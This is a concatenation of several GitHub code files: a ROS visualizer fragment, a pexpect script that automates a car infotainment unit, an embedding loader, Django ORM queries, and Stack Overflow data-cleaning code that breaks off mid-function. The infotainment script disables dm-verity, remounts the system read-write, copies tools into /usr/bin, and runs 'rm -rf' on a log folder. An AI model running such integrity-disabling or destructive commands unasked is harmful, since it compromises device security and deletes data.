else 0.0\n\n\t\tma1.lifetime = rospy.Duration(0.1)\n\t\tq1 = quaternion_from_euler(0, 0, self.ang1)\n\t\tma1.pose.orientation = Quaternion(x = q1[0],\n\t\t\t\t\t\t\t\t\t\t\t y = q1[1],\n\t\t\t\t\t\t\t\t\t\t\t z = q1[2],\n\t\t\t\t\t\t\t\t\t\t\t w = q1[3])\n\n\t\tma2 = copy.deepcopy(ma1)\n\t\tma2.id = 1\n\t\tq2 = quaternion_from_euler(0, 0, self.ang2)\n\t\tma2.pose.orientation = Quaternion(x = q2[0],\n\t\t\t\t\t\t\t\t\t\t\t y = q2[1],\n\t\t\t\t\t\t\t\t\t\t\t z = q2[2],\n\t\t\t\t\t\t\t\t\t\t\t w = q2[3])\n\n\t\tma_array = MarkerArray()\n\t\tma_array.markers.append(ma1)\n\t\t#ma_array.markers.extend([ma1, ma2])\n\t\tself.marker_pub.publish(ma_array)\n\t\tself.lock.release()\n\nif __name__ == '__main__':\n\n\tsys.argv[len(sys.argv) - 1] = '--name'\n\tsys.argv[len(sys.argv) - 2] = '--default'\n\n\tparser = argparse.ArgumentParser()\n\n\t#options for VAD\n\t#automatic gain normalisation\n\tparser.add_argument(\"-a_min\", \"--a_min\", dest= 'a_min', type=float, help=\"min value of arousal\", default=-1.0)\n\tparser.add_argument(\"-a_max\", \"--a_max\", dest= 'a_max', type=float, help=\"max value of arousal\", default=1.0)\n\t\n\tparser.add_argument(\"-v_min\", \"--v_min\", dest= 'v_min', type=float, help=\"min value of valence\", default=-1.0)\n\tparser.add_argument(\"-v_max\", \"--v_max\", dest= 'v_max', type=float, help=\"max value of valence\", default=1.0)\n\n\tparser.add_argument(\"-th\", \"--threshold\", dest= 'threshold', type=float, help=\"threshold\", default=0.3)\n\tparser.add_argument(\"--default\", help=\"default\", action=\"store_true\")\n\tparser.add_argument(\"--name\", help=\"name\", action=\"store_true\")\n\n\t#parser.add_argument(\"-h\", \"--help\", help=\"help\", action=\"store_true\")\n\n\targs = parser.parse_args()\n\n\trospy.init_node('ser_features_visualizer', anonymous=True)\n\tsv = SoundViz(args.a_min, args.a_max, args.v_min, args.v_max, args.threshold)\n\trospy.spin()","repo_name":"bajo/squirrel_hri_orig","sub_path":"squirrel_ser/src/visualisation_ser.py","file_name":"visualisation_ser.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18302917919","text":"import json\nimport os\nimport pprint\nimport sys\nimport time\n\nimport jsonpath\nimport pexpect\n\nfrom peri_step1 import P_step1\nfrom step2 import Scp\n\nclass P_step1_v2(Scp):\n def __init__(self, json_list=[], json_dict={}):\n Scp.__init__(self)\n self.json_list = json_list\n self.json_dict = json_dict\n # @staticmethod\n # def saveAsFile(file_path, file_name, json_data):\n # path = P_step1_v2.auto_save_file(file_path + \"/\" + file_name)\n # fazit_clip.dump(json_data, open(path, 'w'), ensure_ascii=False,\n # indent=4, separators=(\", \", \" : \"))\n # # print(\"{0} is {1}\".format(\"path\",path))\n # return path\n #\n # @staticmethod\n # def saveFile(file_path, file_name, json_data):\n # path = file_path + os.sep + file_name\n # fazit_clip.dump(json_data, open(path, 'w'), ensure_ascii=False,\n # indent=4, separators=(\", \", \" : \"))\n # # print(\"{0} is {1}\".format(\"path\",path))\n # return path\n\n def add_send_expect_v2(self, strS, strE):\n # exec script only:\n newDict = {}\n newDict[\"sendline\"] = strS\n newDict[\"expect\"] = strE\n self.json_list.append(newDict)\n\n def set_pexpect_command_v1(self, json_path, json_file, log_path):\n with open(\"{0}/{1}\".format(json_path, json_file), encoding=\"utf-8\") as json_data, \\\n open(log_path, 'a')as logs:\n data = json.load(json_data)\n spawn_command = jsonpath.jsonpath(data, \"$.head..spawn_command\")[0]\n logs.write(spawn_command + \"\\n\")\n if not False:\n logs.write(\n \"pexpect.spawn(command={0}, , logfile={1}, encoding={2}, timeout={3})\\n\".format(spawn_command, logs,\n \"utf-8\", \"20\"))\n try:\n p = pexpect.spawn(command=spawn_command, logfile=sys.stdout, encoding='utf-8', timeout=10)\n spawn_command_expect = jsonpath.jsonpath(data, \"$.head..spawn_command_expect\")[0]\n logs.write(\"p.expect({0})\\n\".format(spawn_command_expect))\n p.expect(spawn_command_expect)\n for ele_dict in (\n jsonpath.jsonpath(data, \"$.head[?(@.sendline)]\"),\n jsonpath.jsonpath(data, \"$.body[?(@.sendline)]\"), \\\n jsonpath.jsonpath(data, \"$.tail[?(@.sendline)]\")):\n for i in range(len(ele_dict)):\n P_step1_v2.pAction_v3(ele_dict[i], cls=p)\n except pexpect.TIMEOUT:\n print(P_step1_v2.repr_message(\"pexpect.TIMEOUT\"))\n\n @staticmethod\n def pAction_v3(Jdist, cls=None, logFile=None):\n if Jdist.get(\"sendline\", None) != None:\n cls.sendline(Jdist[\"sendline\"])\n else:\n raise ValueError(\"sendline is not given\")\n if Jdist.get(\"expect\", None) != None:\n if isinstance(Jdist.get(\"expect\", None), list) == True: # check if the given is list\n print(f'Jdist[\\\"expect\\\"]: {Jdist[\"expect\"]}')\n index = cls.expect([Jdist[\"expect\"][0],pexpect.TIMEOUT,pexpect.EOF,Jdist[\"expect\"][1]])\n if index == 0:\n print(f\"index: {index}\")\n print(\"We're in status 0\")\n pass\n elif index == 1:\n print(f\"index: {index}\")\n print(\"pexpect.TIMEOUT\")\n elif index == 2:\n print(f\"index: {index}\")\n print(\"pexpect.EOF\")\n elif index == 3:\n print(f\"index: {index}\")\n print(\"We're in status 3\")\n pass\n else:\n cls.expect(Jdist[\"expect\"])\n else:\n cls.buffer = \"\"\n print(\"expect is not given, the sendline is {0}\".format(Jdist.get(\"sendline\", None)))\n\n\ndef persistence_set_key():\n HU_set = P_step1()\n # print(\"*\"*60)\n # print(HU_set.json_dict)\n # print(\"*\"*60)\n # print(\"*\" * 60)\n # print(HU_set.json_list)\n # print(\"*\" * 60)\n HU_set.json_list = []\n HU_set.setProjectDir(os.path.dirname(os.getcwd()))\n HU_set.setJsonDir(\"/fazit_clip\")\n HU_set.set_codingFiles(\"/codingFiles\")\n HU_set.setLogDir(\"/logs\")\n HU_set.log_name += \"/step2_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n HU_set.setErrorDir(\"/errors\")\n HU_set.error_name += \"/error_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n print(\"{0}:\\t{1}\".format(\"HU_set.codingFiles_dir\", HU_set.codingFiles_dir))\n # json_name = \"persistence.fazit_clip\"\n ####HERE: pls assign value here####\n # HU_set.set_nsKey_dict(\"persistenceOverview_wData_0929.txt\")\n\n HU_set.set_nsKey_dict(\"pers_partNum_5HG035866F.txt\")\n ####pls assign value above####\n HU_set.setJsonDir(\"/fazit_clip\")\n print(\"{0}:\\t{1}\".format(\"HU.json_dir\", HU_set.json_dir))\n HU_set.saveFile(HU_set.json_dir, \"pers_partNum_5HG035866F.fazit_clip\", HU_set.nsKey_dict_list)\n # sys.exit()\n rawDataFile = HU_set.json_dir + \"/\" + \"pers_partNum_5HG035866F.fazit_clip\"\n ns_list = HU_set.get_json_info(rawDataFile, \"$..Namespace_hex\", codingFormat=\"utf_8_sig\")\n key_list = HU_set.get_json_info(rawDataFile, \"$..Key\", codingFormat=\"utf_8_sig\")\n data_list = HU_set.get_json_info(rawDataFile, \"$..Data\", codingFormat=\"utf_8_sig\")\n for ns, key, data in zip(ns_list, key_list, data_list):\n if ns.startswith(\"0x\") and key.startswith(\"0x\"):\n HU_set.add_send_expect(\n strS=\"./tsd.persistence.client.mib3.app.SetKey --ns {0} --key {1} --val 0x{2}\".format(ns, key, data) \\\n , strE=\"store: ns: {0} key: {1} slot: 0\".format(ns[2:], int(key, 16)), \\\n str_ns=ns, str_key=key, str_data=data)\n HU_set.combineAsJson_v2(\"/usr/bin\") # In this func, it sets the self.json_dict\n HU_set.saveFile(HU_set.json_dir, \"SetKey_\" + \"pers_partNum_5HG035866F.fazit_clip\", HU_set.json_dict)\n HU_set.set_pexpect_command_v2(HU_set.json_dir, \"SetKey_\" + \"pers_partNum_5HG035866F.fazit_clip\", HU_set.log_name, HU_set.error_name)\n pprint.pprint(HU_set.key_data_list)\n\nif __name__ == '__main__':\n import subprocess\n\n\n\n def check_ping(address = \"192.168.1.4\"):\n str1 = 'ping -c 3 '\n str2 = address\n str3 = ' | grep \\'0 received\\' | wc -l'\n command = str1 + str2 + str3\n print(command)\n p = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE)\n result = p.stdout.read()\n return result.strip().decode(\"utf-8\")\n\n\n while True:\n if check_ping(\"192.168.1.4\") == \"0\":\n break\n else:\n pass\n\n from step2 import transfer\n transfer(\"/var\")\n\n # sys.exit()\n HU_exec = P_step1_v2()\n HU_exec.setProjectDir(os.path.dirname(os.getcwd()))\n HU_exec.setJsonDir(\"fazit_clip\")\n HU_exec.setLogDir(\"logs\")\n HU_exec.log_path = HU_exec.logs_folder + \"/HU_exec_\" + time.strftime(\"%Y%m%d_%H_%M_%S\",\n time.localtime(time.time())) + \".txt\"\n HU_exec.add_send_expect_v2(strS = \"disable-dm-verity.sh\", strE = [\"Connection\",\"infotainment\"])\n HU_exec.combineAsJson_v2(\"/var\")\n HU_exec.saveFile(HU_exec.json_folder, \"[default]exec_disable-dm-verity.fazit_clip\", HU_exec.json_dict)\n HU_exec.set_pexpect_command_v1(HU_exec.json_folder, \"[default]exec_disable-dm-verity.fazit_clip\", HU_exec.log_path)\n # sys.exit()\n\n HU_exec = P_step1_v2()\n HU_exec.json_list = []\n HU_exec.setProjectDir(os.path.dirname(os.getcwd()))\n HU_exec.setJsonDir(\"fazit_clip\")\n HU_exec.setLogDir(\"logs\")\n HU_exec.log_path = HU_exec.logs_folder + \"/HU_exec_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n HU_exec.add_send_expect_v2(strS=\"mount-read-write.sh\", strE = \"infotainment\")\n HU_exec.add_send_expect_v2(strS=\"scp -r tsd.persistence.client.mib3.app.* /usr/bin\", strE=\"infotainment\")\n HU_exec.add_send_expect_v2(strS=\"cd /usr/bin\", strE=\"/usr/bin\")\n HU_exec.setToolDir(\"tools\")\n HU_exec.setFileList(HU_exec.tools_folder)\n for i in HU_exec.fileList:\n HU_exec.add_send_expect(f\"sha1sum {os.path.split(i)[-1]}\",\n f\"{HU_exec.getSha1sum(i).split()[0]} {os.path.split(i)[-1]}\")\n HU_exec.combineAsJson_v2(\"/var\")\n HU_exec.saveFile(HU_exec.json_folder, \"[default]transfer_files_to_var.fazit_clip\", HU_exec.json_dict)\n HU_exec.set_pexpect_command_v1(HU_exec.json_folder, \"[default]transfer_files_to_var.fazit_clip\", HU_exec.log_path)\n # sys.exit()\n\n persistence_set_key()\n os.system(\"rm -rf /home/jpcc/PycharmProjects/pythonProject_Oct_2022/coding_file_version3/logs/*\")\n\n","repo_name":"benefactor007/pythonProject_Oct_2022","sub_path":"coding_file_version3/main/prei_write_v1.py","file_name":"prei_write_v1.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15389615728","text":"#! /usr/bin/env python\r\n#coding=utf-8\r\nimport numpy as np\r\n\r\nclass Embedding:\r\n def __init__(self):\r\n self.d={}\r\n \r\n count=0\r\n for line in open(r'data/model.w2v.txt','rb'):\r\n line=line.strip()\r\n if len(line)>0 and count>0:\r\n p=line.split(' ')\r\n emb_len=len(p)-1\r\n word=p[0].strip()\r\n v=np.empty((emb_len),dtype=\"float32\")\r\n for i in range(emb_len):\r\n v[i]=float(p[i+1])\r\n self.d[word]=v\r\n count+=1\r\n \r\n def embed_word(self,w):\r\n if w not in self.d:\r\n return None\r\n else:\r\n return self.d[w]\r\n","repo_name":"wangzq870305/ddos_forecast","sub_path":"embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"26003580831","text":"from django.shortcuts import render, redirect\nfrom .models import League, Team, Player\nfrom django.db.models import Count\n\nfrom . import team_maker\n\ndef index(request):\n\tcontext = {\n\t\t\"leagues\": League.objects.all(),\n\t\t\"teams\": Team.objects.all(),\n\t\t\"players\": Player.objects.all(),\n\t\t\"atlantic_soccer_teams\": Team.objects.filter(league__name='Atlantic Soccer Conference'),\n\t\t\"curr_boston_players\": Player.objects.filter(curr_team__team_name='Penguins',curr_team__location='Boston'),\n\t\t\"Baseball_curr_players\": Player.objects.filter(curr_team__league__name=\"International Collegiate Baseball Conference\"),\n\t\t\"american_curr_players\": Player.objects.filter(curr_team__league__name=\"American Conference of Amateur Football\", last_name='Lopez'),\n\t\t'football_players':Player.objects.filter(curr_team__league__sport=\"Football\"),\n\t\t'sophia_teams':Team.objects.filter(curr_players__first_name=\"Sophia\"),\n\t\t'sophia_leagues':League.objects.filter(teams__curr_players__first_name=\"Sophia\"),\n\t\t'Flores_not_in_Roughriders':Player.objects.filter(last_name='Flores').exclude(curr_team__location='Washington',curr_team__team_name='Roughriders'),\n\t\t'Samuel_teams':Team.objects.filter(all_players__first_name=\"Samuel\", all_players__last_name=\"Evans\"),\n\t\t'Tiger_Cats_Players':Player.objects.filter(all_teams__location=\"Manitoba\", all_teams__team_name='Tiger-Cats'),\n\t\t'vikings_formerly_players':Player.objects.filter(all_teams__location=\"Wichita\" , all_teams__team_name=\"Vikings\").exclude(curr_team__location=\"Wichita\", curr_team__team_name='Vikings'),\n\t\t'jacob_former_teams':Team.objects.filter(all_players__first_name=\"Jacob\", all_players__last_name=\"Gray\").exclude(team_name='Colts', location='Oregon'),\n\t\t'all_joshua_in_atlantic':Player.objects.filter(first_name=\"Joshua\", all_teams__league__name='Atlantic Federation of Amateur Baseball Players'),\n\t\t'12_players_teams':Team.objects.annotate(counter=Count('all_players')).filter(counter__gte=12),\n\t\t'players_and_counts':Player.objects.annotate(counts=Count('all_teams')).order_by('counts'),\n\t}\n\treturn render(request, \"leagues/index.html\", context)\n\ndef make_data(request):\n\tteam_maker.gen_leagues(10)\n\tteam_maker.gen_teams(50)\n\tteam_maker.gen_players(200)\n\n\treturn redirect(\"index\")","repo_name":"Reem310/Django","sub_path":"Django_ORM/sports_orm_2/leagues/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23593510480","text":"'''\n构造数据集,主要包括两个函数\n1. attr_extractor\n主要用于过滤优质问题,输入输出都是xml文件\n2. content_extractor\n主要用于过滤不符合文本+代码、长度要求、和其它tag重复的内容,输入为xml,输出为json\n'''\nimport xmltodict\nimport ipdb\nimport datetime\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\nimport html\nimport json\nfrom html.parser import HTMLParser\nfrom transformers import RobertaTokenizer\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import PercentFormatter\n\nBATCH_SIZE = 1000\nLANGUAGES = set(['', '', '', '', '', '', ''])\n\nspecial_tokens_id = list(range(33, 48))\nspecial_tokens_id += list(range(58, 65))\nspecial_tokens_id += list(range(91, 97))\nspecial_tokens_id += list(range(123, 127))\nspecial_tokens = [chr(i) for i in special_tokens_id]\n\ndef convention_tokenize(text):\n '''\n 针对特殊符号分词\n '''\n for st in special_tokens:\n text = f' {st} '.join(text.split(st)).strip()\n tokens = text.split()\n return tokens\n\ndef plot_histogram(x, distance):\n '''\n x is a list containing numbers\n distance is an int number indicating the x-axis distance\n '''\n d = distance\n plt.figure()\n min_x = int(min(x))\n max_x = int(max(x))\n range_by_d = range(min_x, max_x + d, d)\n plt.hist(x, range_by_d, weights=np.ones(len(x))/len(x))\n plt.xticks(range_by_d)\n plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n plt.grid()\n plt.show()\n\nclass OrderedCounter(Counter, OrderedDict):\n def __repr__(self):\n return \"%s(%r)\" % (self.__class__.__name__, OrderedDict(self))\n\ndef write_lines(lines, target):\n with open(target, 'a', encoding='utf-8') as f:\n f.writelines(lines)\n\ndef line_counter(source_path):\n '''\n 简单统计文件行数\n '''\n count = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n for line in tqdm(f):\n count += 1\n print(f'{source_path} total {count} lines')\n return count\n\ndef include_extractor(\n source_path, target_path,\n filters, total_line_count=None\n ):\n '''\n 根据包含关系抽取数据行\n '''\n result = []\n target_line_count = 0\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n t.update(1)\n flag_to_keep = True\n for fltr in filters:\n if fltr not in line:\n flag_to_keep = False\n if not flag_to_keep:\n continue\n result.append(line)\n target_line_count += 1\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.close()\n if result:\n write_lines(result, target_path)\n print(f'{target_path} total line {target_line_count}')\n\ndef attr_counter(source_path, attr, total_line_count=None, condition_func=lambda x: True):\n '''\n 根据属性统计数量特征\n '''\n counts = []\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n line_json = xmltodict.parse(line)\n if condition_func(line_json['row']):\n counts.append(line_json['row'][attr])\n t.update(1)\n t.close()\n count_result = Counter(counts).most_common()\n percentage_result = dict()\n accumulative_count = dict()\n # for item in count_result:\n # percentage_result[item[0]] = round(item[1]/total_line_count, 2)\n for item in count_result:\n bigger_count = 0\n for comparable_item in count_result:\n if int(comparable_item[0]) >= int(item[0]):\n bigger_count += comparable_item[1]\n accumulative_count[item[0]] = bigger_count\n print(total_line_count)\n # print(count_result)\n # print(percentage_result)\n print(accumulative_count)\n return count_result, percentage_result, accumulative_count\n\ndef attr_extractor(\n source_path, target_path,\n condition_func, total_line_count=None\n ):\n '''\n 按照属性条件进行抽取\n '''\n result = []\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n line_json = xmltodict.parse(line)\n if condition_func(line_json['row']):\n result.append(line)\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.update(1)\n t.close()\n if result:\n write_lines(result, target_path)\n\ndef time_counter(source_path, total_len):\n '''\n 按年/月统计问题数量\n '''\n by_month = []\n by_year = []\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n # line_json = xmltodict.parse(line)\n # time_str = line_json['row']['@CreationDate']\n line_json = json.loads(line.strip())\n time_str = line_json['@CreationDate']\n time_obj = datetime.datetime.strptime(time_str,'%Y-%m-%dT%H:%M:%S.%f')\n # by_month.append(time_obj.strftime('%Y-%m'))\n by_year.append(time_obj.strftime('%Y'))\n t.update(1)\n t.close()\n # print(OrderedCounter(by_month))\n print(OrderedCounter(by_year))\n\n'''\n解析post body中的html标签\n'''\nclass BodyParser(HTMLParser):\n def __init__(self):\n super(BodyParser, self).__init__()\n self.result = []\n self.current_tag = None\n self.current_text = ''\n self.current_code = ''\n\n def simplify_tag(self, tag):\n if tag == 'code':\n return tag\n return 'text'\n\n def handle_starttag(self, tag, attrs):\n tag = self.simplify_tag(tag)\n if not self.current_tag:\n self.current_tag = tag\n return\n if tag == 'code' and tag != self.current_tag:\n self.result.append(('text', self.current_text))\n self.current_text = ''\n elif tag == 'text' and tag != self.current_tag:\n self.result.append(('code', self.current_code))\n self.current_code = ''\n self.current_tag = tag\n\n\n def handle_endtag(self, tag):\n tag = self.simplify_tag(tag)\n if tag == 'code': \n self.result.append(('code', self.current_code))\n self.current_code = ''\n self.current_tag = 'text' # 因为中不会有别的标签\n elif tag == 'text':\n self.result.append(('text', self.current_text))\n self.current_text = ''\n\n def handle_data(self, data):\n data = html.unescape(data).strip()\n if not data:\n return\n if self.current_tag == 'text':\n self.current_text += f'{data} '\n elif self.current_tag == 'code':\n self.current_code += f'{data} '\n \n def denoising(self, data):\n # 删去content中的特殊字符\n for char in ['\\r\\n', '\\r', '\\n']:\n data = data.replace(char, ' ')\n data = ''.join([i if ord(i) < 128 else ' ' for i in data])\n data = ' '.join(data.split())\n return data\n\n def get_result(self):\n '''\n 返回空值:\n 1. 该行解析结果为空\n 2. 不同时包含code与text\n '''\n if not self.result:\n return []\n merged_result = []\n last_tag = self.result[0][0]\n current_content = self.result[0][1]\n for segment in self.result[1:]:\n tag, content = segment\n if (not content) or (not content.strip()):\n continue\n if tag != last_tag:\n merged_result.append((last_tag, current_content))\n last_tag = tag\n current_content = content\n continue\n current_content += content\n merged_result.append((last_tag, current_content))\n cleaned_result = []\n # 删去空白的内容\n for item in merged_result:\n if not item[1]:\n continue\n denoised_content = self.denoising(item[1])\n if denoised_content:\n cleaned_result.append((item[0], denoised_content))\n return cleaned_result\n\ndef content_counter(source_path, total_len, language):\n '''\n 统计各类标签的总数\n '''\n tag_count = {\n 'code': 0,\n 'text': 0\n } # 统计包含各类标签的问题数\n lang_tags = set()\n other_language_tags = LANGUAGES - set([f'<{language}>'])\n repeated_question = 0\n blank_line = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n t.update(1)\n line_json = xmltodict.parse(line)\n body_str = line_json['row']['@Body']\n\n tags_raw = line_json['row']['@Tags']\n for lang_tag in other_language_tags:\n if lang_tag in tags_raw:\n repeated_question += 1\n break\n\n parser = BodyParser()\n parser.feed(body_str)\n content = parser.get_result()\n if not content:\n blank_line += 1\n continue\n tags = set()\n for segment in content:\n tag, tag_content = segment\n tags.add(tag)\n for tag in tags:\n # 统计包含该标签的问题数\n tag_count[tag] += 1 \n t.close()\n print(f'total: {total_len}')\n print(tag_count)\n print(blank_line)\n print(f'repeated_question {repeated_question}')\n\n'''\n解析post body中的html标签\n'''\ndef content_extractor(source_path, target_path, total_len, language):\n '''\n 把xml数据变为最终要用的json数据\n '''\n result = []\n other_language_tags = LANGUAGES - set([f'<{language}>'])\n # tokenizer = RobertaTokenizer.from_pretrained('microsoft/codebert-base', do_lower_case=False)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n blank_lines = 0\n only_code = 0\n only_text = 0\n for line in f:\n t.update(1)\n line_json = xmltodict.parse(line)\n body_str = line_json['row']['@Body']\n parser = BodyParser()\n parser.feed(body_str)\n line_parsed = parser.get_result()\n # 移除和其他language重复的post\n language_tag_flag = False\n tags_raw = line_json['row']['@Tags']\n for lang_tag in other_language_tags:\n if lang_tag in tags_raw:\n language_tag_flag = True\n if language_tag_flag:\n continue\n # 删去不同时包含text和code的内容\n if not line_parsed:\n blank_lines += 1\n continue\n tags = [item[0] for item in line_parsed]\n if ('code' in tags) and ('text' not in tags):\n only_code += 1\n continue\n elif ('text' in tags) and ('code' not in tags):\n only_text += 1\n continue\n line_json['row']['@Body'] = line_parsed\n # 删去分词后长度过短或过长的\n len_item = {\n 'total': 0,\n 'text': 0,\n 'code': 0\n }\n for segment in line_json['row']['@Body']:\n if segment[0] == 'text':\n len_item['text'] += len(convention_tokenize(segment[1]))\n else:\n len_item['code'] += len(convention_tokenize(segment[1]))\n len_item['total'] = len_item['text'] + len_item['code']\n if len_item['total'] > 1000:\n continue\n raw_title = line_json['row']['@Title']\n line_json['row']['@Title'] = ''.join([i if ord(i) < 128 else ' ' for i in raw_title])\n line_json_str = json.dumps(line_json['row'])\n result.append(f'{line_json_str}\\n')\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.close()\n if result:\n write_lines(result, target_path)\n print(f'blank lines: {blank_lines}, only_code: {only_code}, only_text: {only_text}')\n\ndef use_attr_extractor():\n '''\n 主要用于过滤优质问题,输入输出都是xml文件\n '''\n language_all_path = './data/dataset/all/{}-all.xml'\n # for language in ['go', 'javascript', 'python', 'c#', 'php', 'ruby', 'java']:\n # '''按条件抽取并新建文件'''\n # TAG = f'<{language}>'\n # filters = [TAG]\n # include_extractor(source_path, language_all_path.format(language), filters, total_lines)\n for language, total_lines in [\n # ('go', 50355), ('python', 1597777), ('c#', 1450789), ('php', 1381587), ('ruby', 216776), ('java', 1735380), ('javascript', 2130667)\n ('java', 1735380)\n ]:\n '''统计语言文件的回答数分布'''\n print(f'------------{language}------------')\n condition = lambda x: int(x['@Score']) >= 1 and '@AcceptedAnswerId' in x and '@ClosedDate' not in x and int(x['@AnswerCount']) >= 1\n attr_extractor(language_all_path.format(language), './data/dataset/all/java-a1-s1.xml', condition, total_lines)\n # attr_counter(language_all_path.format(language), '@AnswerCount', total_lines, condition)\n # time_counter( './data/dataset/java-a3-s3-no-code.xml', 81123)\n\ndef use_content_extractor():\n '''\n 主要用于过滤不符合文本+代码、长度要求、和其它tag重复的内容,输入为xml,输出为json\n '''\n # source_path = './data/dataset/all/python-a1-s2.xml'\n # target_path = './data/dataset/all/python-a1-s2-len-lte-1000-only-text.jsonl'\n # python_lines = 267717\n # content_extractor(source_path, target_path, python_lines, 'python')\n # 用于统计不包含代码的post数量随时间分布规律\n # time_counter(target_path, 27093)\n # content_counter(source_path, python_lines, 'python')\n source_path = './data/dataset/all/java-a1-s1.xml'\n target_path = './data/dataset/all/java-a1-s1-len-lte-1000.jsonl'\n java_lines = 462244\n content_extractor(source_path, target_path, java_lines, 'java')\n\ndef token_len_counter(source_path, total_len):\n '''\n 统计每个post body的token长度,并分别计算text和code的长度\n 最终生成分位数:总长度分位数、text长度分位数、code长度分位数\n '''\n # tokenizer = RobertaTokenizer.from_pretrained('microsoft/codebert-base', do_lower_case=False)\n result = []\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n t.update(1)\n line_json = json.loads(line)\n body_content = line_json['@Body']\n len_item = {\n 'total': 0,\n 'text': 0,\n 'code': 0\n }\n for segment in body_content:\n if segment[0] == 'text':\n # len_item['text'] += len(tokenizer.tokenize(segment[1]))\n len_item['text'] += len(convention_tokenize(segment[1]))\n else:\n # len_item['code'] += len(tokenizer.tokenize(segment[1]))\n len_item['code'] += len(convention_tokenize(segment[1]))\n len_item['total'] = len_item['text'] + len_item['code']\n result.append(len_item)\n t.close()\n total_lens = np.array([item['total'] for item in result])\n text_lens = np.array([item['text'] for item in result])\n code_lens = np.array([item['code'] for item in result])\n for label, x in [('total', total_lens)]:\n # for label, x in [('text', text_lens), ('code', code_lens), ('total', total_lens)]:\n print(label)\n for percent in [0, 2, 3, 5, 7, 9, 50, 85, 86, 87, 88, 89, 90, 95, 100]:\n print('{} percent - len {}'.format(percent, np.percentile(x, percent)))\n # plot_histogram(x, 50)\n\ndef construct_3_datasets(source_path, total_len):\n # 得到各类数据集的行号\n # test_size = total_len // 10\n total_size = 40000\n test_size = 2000\n np.random.seed(999)\n total_line_ids = np.arange(total_len)\n total_line_ids_new = np.random.choice(total_line_ids, total_size, replace=False)\n test_ids = np.random.choice(total_line_ids_new, test_size, replace=False)\n total_line_ids = np.setdiff1d(total_line_ids_new, test_ids)\n valid_ids = np.random.choice(total_line_ids, test_size, replace=False)\n # 数据写入\n train_path = source_path.replace('.jsonl', '.train.jsonl')\n test_path = source_path.replace('.jsonl', '.test.jsonl')\n valid_path = source_path.replace('.jsonl', '.valid.jsonl')\n\n test_len = 0\n valid_len = 0\n train_len = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n line_id = 0\n for line in f:\n write_path = None\n t.update(1)\n if line_id in test_ids:\n test_len += 1\n write_path = test_path\n elif line_id in valid_ids:\n valid_len += 1\n write_path = valid_path\n elif line_id in total_line_ids_new:\n train_len += 1\n write_path = train_path\n else:\n line_id += 1\n continue\n write_lines([line], write_path)\n line_id += 1\n t.close()\n print(\"expected: {}-{}\".format(len(valid_ids), len(test_ids)))\n print(\"{}-{}-{}\".format(test_len, valid_len, train_len))\n\ndef construct_3_datasets_by_date(source_path, total_len, start_line, end_line):\n # 数据写入,source_path是json文件\n train_path = source_path.replace('.jsonl', '.train.jsonl')\n test_path = source_path.replace('.jsonl', '.test.jsonl')\n valid_path = source_path.replace('.jsonl', '.valid.jsonl')\n\n test_len = 0\n valid_len = 0\n train_len = 0\n\n total_lines_for_test = end_line - start_line + 1\n test_size = total_lines_for_test // 2\n valid_size = total_lines_for_test - test_size\n total_line_ids = np.arange(start_line, end_line+1)\n test_ids = np.random.choice(total_line_ids, test_size, replace=False)\n total_line_ids = set(total_line_ids)\n test_ids = set(test_ids)\n valid_ids = total_line_ids - test_ids\n\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n line_id = 1\n write_path = None\n for line in f:\n t.update(1)\n if line_id in test_ids:\n test_len += 1\n write_path = test_path\n elif line_id in valid_ids:\n valid_len += 1\n write_path = valid_path\n else:\n train_len += 1\n write_path = train_path\n write_lines([line], write_path)\n line_id += 1\n t.close()\n print(\"expected: {}-{}\".format(len(valid_ids), len(test_ids)))\n print(\"{}-{}-{}\".format(test_len, valid_len, train_len))\n\n\ndef attr_counter_2(source_path, condition_func):\n '''\n 读取jsonl文件\n 文件行数以及关心数据的行数\n '''\n total_count = 0\n condition_count = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n for line in f:\n total_count += 1\n if condition_func(json.loads(line)):\n condition_count += 1\n print(f'{source_path} total {total_count} lines')\n print(f'{source_path} conditioned {condition_count} lines')\n\ndef interrogative_counter():\n source_path = './data/dataset/all/python-a3-s2-len-lte-1000.jsonl'\n def function(json_data):\n target = ['how', 'what', 'why', 'which', 'when']\n title = json_data['@Title'].lower()\n for i in target:\n if i in 